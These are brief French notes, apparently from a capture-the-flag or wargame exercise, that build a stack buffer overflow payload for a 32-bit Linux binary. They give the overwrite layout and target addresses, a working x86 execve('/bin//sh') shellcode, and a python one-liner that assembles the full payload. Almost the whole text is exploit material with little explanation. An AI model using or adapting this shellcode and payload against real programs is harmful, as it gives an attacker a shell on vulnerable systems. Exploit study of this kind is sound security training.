dereference esp+10 dans eax = endroit de l'overflow

[0804a00c + 4] [shellcode pointe par 0804a00c+4] [padding jusqu'au 0804a00c+108] [0804a00c (debut du payload)]

+4 = \x08\x04\xa0\x10

shellcode = \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

padding = A*83

+0 = \x08\x04\xa0\x0c

payload = $(python -c "print '\x08\x04\xa0\x10'[::-1] + '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80' + 'A'*83 + '\x08\x04\xa0\x0c'[::-1]")